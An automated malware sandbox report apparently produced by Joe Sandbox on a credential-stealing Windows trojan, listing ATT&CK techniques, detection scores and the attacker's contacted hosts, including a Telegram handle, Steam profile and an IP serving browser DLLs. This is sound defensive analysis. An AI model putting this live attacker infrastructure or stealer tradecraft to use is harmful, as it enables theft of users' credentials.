Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D768430 sqlite3_bind_int64,	2_2_1D768430
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D7806E0 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,	2_2_1D7806E0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D758680 sqlite3_mprintf,sqlite3_mprintf,sqlite3_initialize,sqlite3_finalize,sqlite3_free,sqlite3_mprintf,sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_int64,	2_2_1D758680
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D814140 sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_initialize,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,	2_2_1D814140
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D7A8200 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,	2_2_1D7A8200
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D767810 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset,	2_2_1D767810
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D75B400 sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,sqlite3_reset,sqlite3_step,sqlite3_reset,sqlite3_column_int64,	2_2_1D75B400
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D7F3770 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	2_2_1D7F3770
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D8137E0 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	2_2_1D8137E0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D78EF30 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code,	2_2_1D78EF30
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D7AA6F0 sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value,	2_2_1D7AA6F0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D7466C0 sqlite3_mprintf,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_null,sqlite3_bind_blob,sqlite3_bind_value,sqlite3_free,sqlite3_bind_value,sqlite3_step,sqlite3_reset,	2_2_1D7466C0
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D7AE170 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,	2_2_1D7AE170
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D79E090 sqlite3_bind_int64,sqlite3_bind_value,sqlite3_step,sqlite3_reset,	2_2_1D79E090
Source: C:\Users\user\AppData\Local\Temp\kat2B07.tmp	Code function: 2_2_1D79E200 sqlite3_initialize,sqlite3_free,sqlite3_bind_int64,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,	2_2_1D79E200

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Shared Modules	Boot or Logon Initialization Scripts	511 Process Injection	2 Obfuscated Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	4 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	1 Install Root Certificate	Security Account Manager	34 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 DLL Side-Loading	NTDS	1 Query Registry	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Masquerading	LSA Secrets	31 Security Software Discovery	SSH	Keylogging	114 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Modify Registry	Cached Domain Credentials	1 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Virtualization/Sandbox Evasion	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	511 Process Injection	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
82xul16VKj.exe	40%	Virustotal		Browse
82xul16VKj.exe	100%	Avira	HEUR/AGEN.1330215
82xul16VKj.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\sqlt[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\kat2B07.tmp	4%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
bg.microsoft.map.fastly.net	0%	Virustotal	Browse
tea.arpdabl.org	2%	Virustotal	Browse
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	0%	Virustotal	Browse
survey-smiles.com	8%	Virustotal	Browse
t.me	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://ocsp.entrust.net03	0%	URL Reputation	safe
http://www.diginotar.nl/cps/pkioverheid0	0%	URL Reputation	safe
http://ocsp.entrust.net0D	0%	URL Reputation	safe
http://www.sqlite.org/copyright.html.	0%	URL Reputation	safe
http://crl.entrust.net/server1.crl0	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://secure.comodo.com/CPS0	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://crl.entrust.net/2048ca.crl0	0%	URL Reputation	safe
https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://steamcommunity.com/profiles/76561199730044335	100%	Avira URL Cloud	malware
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://116.202.180.70:5432/	0%	Avira URL Cloud	safe
https://116.202.180.70:5432/	0%	Virustotal		Browse
https://steamcommunity.com/profiles/76561199730044335	0%	Virustotal		Browse
http://survey-smiles.com/R	12%	Virustotal		Browse
https://116.202.180.70:5432/2r	0%	Avira URL Cloud	safe
http://survey-smiles.com/R	0%	Avira URL Cloud	safe
https://web.telegram.org	0%	Virustotal		Browse
https://web.telegram.org	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://t.me/bu77un	100%	Avira URL Cloud	malware
https://116.202.180.70:5432/softokn3.dll%	0%	Avira URL Cloud	safe
https://www.google.com	0%	Avira URL Cloud	safe
https://116.202.180.70:5432/msvcp140.dll	0%	Avira URL Cloud	safe
http://tea.arpdabl.orgHJK	0%	Avira URL Cloud	safe
https://www.google.com/search?q=wmf	0%	Avira URL Cloud	safe
https://t.me/bu77un	0%	Virustotal		Browse
http://survey-smiles.com/	0%	Avira URL Cloud	safe
https://www.google.com	0%	Virustotal		Browse
http://tea.arpdabl.org5432Content-Disposition:	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	0%	Virustotal		Browse
https://steamcommunity.com/profiles/76561199730044335hellosqlt.dllsqlite3.dll	0%	Avira URL Cloud	safe
http://tea.arpdabl.org/	0%	Avira URL Cloud	safe
http://survey-smiles.com/z	0%	Avira URL Cloud	safe
http://tea.arpdabl.org/v	0%	Avira URL Cloud	safe
http://survey-smiles.com/	8%	Virustotal		Browse
https://116.202.180.70/I	0%	Avira URL Cloud	safe
https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://steamcommunity.com/profiles/76561199730044335hellosqlt.dllsqlite3.dll	0%	Virustotal		Browse
http://rpi.net.au/~ajohnson/resourcehacker	0%	Avira URL Cloud	safe
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	0%	Avira URL Cloud	safe
http://tea.arpdabl.org/	2%	Virustotal		Browse
http://rpi.net.au/~ajohnson/resourcehacker	0%	Virustotal		Browse
http://survey-smiles.com/z	10%	Virustotal		Browse
https://116.202.180.70:5432	0%	Avira URL Cloud	safe
https://www.google.com/favicon.ico	0%	Avira URL Cloud	safe
https://116.202.180.70/2	0%	Avira URL Cloud	safe
http://tea.arpdabl.org/v	1%	Virustotal		Browse
https://116.202.180.70:5432	0%	Virustotal		Browse
https://116.202.180.70:5432/vcruntime140.dll	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
https://116.202.180.70:5432/freebl3.dll	0%	Avira URL Cloud	safe
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	0%	Virustotal		Browse
https://t.me/bu77unguf_hMozilla/5.0	0%	Avira URL Cloud	safe
https://www.google.com/favicon.ico	0%	Virustotal		Browse
https://www.google.com/sorry/index	0%	Avira URL Cloud	safe
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	0%	Virustotal		Browse
http://tea.arpdabl.org/)	0%	Avira URL Cloud	safe
https://116.202.180.70:5432/softokn3.dllP	0%	Avira URL Cloud	safe
http://tea.arpdabl.org	0%	Avira URL Cloud	safe
https://t.me/bu77unguf_hMozilla/5.0	0%	Virustotal		Browse
https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a	0%	Avira URL Cloud	safe
https://116.202.180.70:5432Content-Disposition:	0%	Avira URL Cloud	safe
https://www.google.com/search?q=net	0%	Avira URL Cloud	safe
https://www.google.com/sorry/index	0%	Virustotal		Browse
https://www.google.com/sorry/indextest	0%	Avira URL Cloud	safe
https://116.202.180.70:5432/sqlt.dll	0%	Avira URL Cloud	safe
https://116.202.180.70:5432/mozglue.dll	0%	Avira URL Cloud	safe
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	Avira URL Cloud	safe
http://tea.arpdabl.org	2%	Virustotal		Browse
https://116.202.180.70:5432/nss3.dll	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false	0%, Virustotal, Browse	unknown
tea.arpdabl.org	185.107.56.202	true	false	2%, Virustotal, Browse	unknown
edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	217.20.58.23	true	false	0%, Virustotal, Browse	unknown
survey-smiles.com	199.59.243.226	true	false	8%, Virustotal, Browse	unknown
t.me	149.154.167.99	true	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://steamcommunity.com/profiles/76561199730044335	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://t.me/bu77un	true	0%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://survey-smiles.com/	true	8%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tea.arpdabl.org/	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	BAEBGC.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://116.202.180.70:5432/	kat2B07.tmp, 00000002.00000003.369794652.00000000008E6000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000003.383481823.00000000009C9000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000003.371917226.00000000008ED000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	BAEBGC.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf	BGDGHJ.2.dr	false	Avira URL Cloud: safe	unknown
http://survey-smiles.com/R	kat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmp	true	12%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://116.202.180.70:5432/2r	kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://web.telegram.org	kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ocsp.entrust.net03	kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0	kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.diginotar.nl/cps/pkioverheid0	kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://116.202.180.70:5432/softokn3.dll%	kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com	kat2B07.tmp, 00000002.00000002.425312567.00000000005C8000.00000040.00000400.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://116.202.180.70:5432/msvcp140.dll	kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tea.arpdabl.orgHJK	kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/search?q=wmf	BGDGHJ.2.dr	false	Avira URL Cloud: safe	unknown
http://tea.arpdabl.org5432Content-Disposition:	kat2B07.tmp, 00000002.00000002.425312567.000000000043F000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://steamcommunity.com/profiles/76561199730044335hellosqlt.dllsqlite3.dll	82xul16VKj.exe, 00000000.00000002.342560030.0000000003080000.00000004.00000800.00020000.00000000.sdmp, 82xul16VKj.exe, 00000000.00000002.342253005.00000000002A0000.00000040.00001000.00020000.00000000.sdmp, 82xul16VKj.exe, 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.0000000000425000.00000040.00000400.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://survey-smiles.com/z	kat2B07.tmp, 00000002.00000002.425497863.00000000009B1000.00000004.00000020.00020000.00000000.sdmp	true	10%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ocsp.entrust.net0D	kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tea.arpdabl.org/v	kat2B07.tmp, 00000002.00000002.425497863.00000000008C4000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.sqlite.org/copyright.html.	kat2B07.tmp, 00000002.00000002.428053868.000000002974E000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.427946769.000000001D97D000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.2.dr	false	URL Reputation: safe	unknown
https://116.202.180.70/I	kat2B07.tmp, 00000002.00000002.425497863.00000000008C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.entrust.net/server1.crl0	kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i	BGDGHJ.2.dr	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	BAEBGC.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://rpi.net.au/~ajohnson/resourcehacker	82xul16VKj.exe, 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000000.341903981.00000000004B4000.00000002.00000001.01000000.00000004.sdmp, kat2B07.tmp.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	BAEBGC.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://116.202.180.70:5432	kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.00000000005C8000.00000040.00000400.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/favicon.ico	BAEBGC.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://116.202.180.70/2	kat2B07.tmp, 00000002.00000002.425497863.00000000008C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://116.202.180.70:5432/vcruntime140.dll	kat2B07.tmp, 00000002.00000002.425497863.00000000008F8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	BAEBGC.2.dr	false	URL Reputation: safe	unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0	kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://116.202.180.70:5432/freebl3.dll	kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://t.me/bu77unguf_hMozilla/5.0	82xul16VKj.exe, 00000000.00000002.342560030.0000000003080000.00000004.00000800.00020000.00000000.sdmp, 82xul16VKj.exe, 00000000.00000002.342253005.00000000002A0000.00000040.00001000.00020000.00000000.sdmp, 82xul16VKj.exe, 00000000.00000002.342512838.0000000002DE0000.00000040.00001000.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.0000000000425000.00000040.00000400.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/sorry/index	kat2B07.tmp, 00000002.00000003.383481823.00000000009C9000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425244038.000000000026F000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.00000000005C8000.00000040.00000400.00020000.00000000.sdmp, BGDGHJ.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tea.arpdabl.org/)	kat2B07.tmp, 00000002.00000002.425497863.00000000008C4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://116.202.180.70:5432/softokn3.dllP	kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tea.arpdabl.org	kat2B07.tmp, 00000002.00000002.425312567.0000000000439000.00000040.00000400.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425312567.000000000043F000.00000040.00000400.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a	BGDGHJ.2.dr	false	Avira URL Cloud: safe	unknown
https://116.202.180.70:5432Content-Disposition:	kat2B07.tmp, 00000002.00000002.425312567.00000000005C8000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/search?q=net	BGDGHJ.2.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com/sorry/indextest	kat2B07.tmp, 00000002.00000003.383481823.00000000009B3000.00000004.00000020.00020000.00000000.sdmp, BGDGHJ.2.dr	false	Avira URL Cloud: safe	unknown
https://116.202.180.70:5432/sqlt.dll	kat2B07.tmp, 00000002.00000003.371917226.00000000008E9000.00000004.00000020.00020000.00000000.sdmp, kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://secure.comodo.com/CPS0	kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://116.202.180.70:5432/mozglue.dll	kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	BAEBGC.2.dr	false	URL Reputation: safe	unknown
http://crl.entrust.net/2048ca.crl0	kat2B07.tmp, 00000002.00000002.425497863.0000000000844000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	BAEBGC.2.dr	false	Avira URL Cloud: safe	unknown
https://116.202.180.70:5432/nss3.dll	kat2B07.tmp, 00000002.00000002.425497863.00000000008E9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.107.56.202	tea.arpdabl.org	Netherlands	43350	NFORCENL	false
116.202.180.70	unknown	Germany	24940	HETZNER-ASDE	false
199.59.243.226	survey-smiles.com	United States	395082	BODIS-NJUS	false
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1466531
Start date and time:	2024-07-03 02:21:27 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	82xul16VKj.exe renamed because original name is a hash value
Original Sample Name:	07b71144db1788265d841a6e5c6c719e0010fd8de93279510be7431556a8f957.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/14@4/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 72% Number of executed functions: 11 Number of non-executed functions: 227
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 217.20.58.23
Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:22:17	API Interceptor	322x Sleep call for process: kat2B07.tmp modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
199.59.243.226	rPRESUPUESTO.exe	Get hash	malicious	FormBook	Browse	www.mommysdaycare.net/k4dg/
	1R50C5E13BU8I.exe	Get hash	malicious	FormBook	Browse	www.42bomclub.com/zq0e/
	AWB 112-17259653.exe	Get hash	malicious	FormBook	Browse	www.window-replace5.top/dihh/
	eiqj38BeRo.rtf	Get hash	malicious	FormBook	Browse	www.home-repair-contractors-kfm.xyz/btrd/?OR-TJfQ=eVMlJIJ+geaZUobAArdtG7xbZNorDbW6x7q4JZ9YU9WFmkuuB+jImMamgZk5Kk8mIb1RaQ==&2dc=kvXd-rKHCF
	mEESdHRhbB.exe	Get hash	malicious	FormBook	Browse	www.42bomclub.com/zq0e/
	SWU5109523I.exe	Get hash	malicious	FormBook, Lokibot	Browse	www.42bomclub.com/zq0e/
	Invoice_Payment.exe	Get hash	malicious	FormBook	Browse	www.mommysdaycare.net/k4dg/
	http://visit.keznews.com	Get hash	malicious	Unknown	Browse	ww82.keznews.com/favicon.ico
	Custom_Inv_5634756433.exe	Get hash	malicious	FormBook	Browse	www.swordshoop.ca/b1td/
	http://cns.archiq.net	Get hash	malicious	Unknown	Browse	cns.archiq.net/_tr
149.154.167.99	http://telegramtw1.org/	Get hash	malicious	Unknown	Browse	telegram.org/?setln=pl
	http://makkko.kz/	Get hash	malicious	Unknown	Browse	telegram.org/
	http://telegram.dog	Get hash	malicious	Unknown	Browse	telegram.dog/
	LnSNtO8JIa.exe	Get hash	malicious	Cinoshi Stealer	Browse	t.me/cinoshibot
	jtfCFDmLdX.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	t.me/cinoshibot
	vSlVoTPrmP.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	t.me/cinoshibot
	RO67OsrIWi.exe	Get hash	malicious	Gurcu Stealer, PrivateLoader, RedLine, RisePro Stealer, SmokeLoader, zgRAT	Browse	t.me/cinoshibot
	KeyboardRGB.exe	Get hash	malicious	Unknown	Browse	t.me/cinoshibot
	file.exe	Get hash	malicious	Cinoshi Stealer	Browse	t.me/cinoshibot

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
t.me	file.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	PureLog Stealer, Vidar	Browse	149.154.167.99
	pDHKarOK2v.exe	Get hash	malicious	CryptOne, Vidar	Browse	149.154.167.99
	1719859269.0326595_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig	Browse	149.154.167.99
	https://clicktime.cloud.postoffice.net/clicktime.php?U=https%3A%2F%2Ftelegra.ph%2FDavis-Insurance-Agency-LLC-06-28&E=kgarber%40woodlandsbank.com&X=XID311CFbwQP1837Xd1&T=WDLP&HV=U,E,X,T&H=3a14786ee7a8dd2b0305ef5dd961d4108cbfaf34	Get hash	malicious	Unknown	Browse	149.154.167.99
	zyJWi2vy29.exe	Get hash	malicious	LummaC, PureLog Stealer, RisePro Stealer, Vidar, zgRAT	Browse	149.154.167.99
	56bDgH9sMQ.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
tea.arpdabl.org	1719859269.0326595_setup.exe	Get hash	malicious	LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, Xmrig	Browse	207.180.253.128
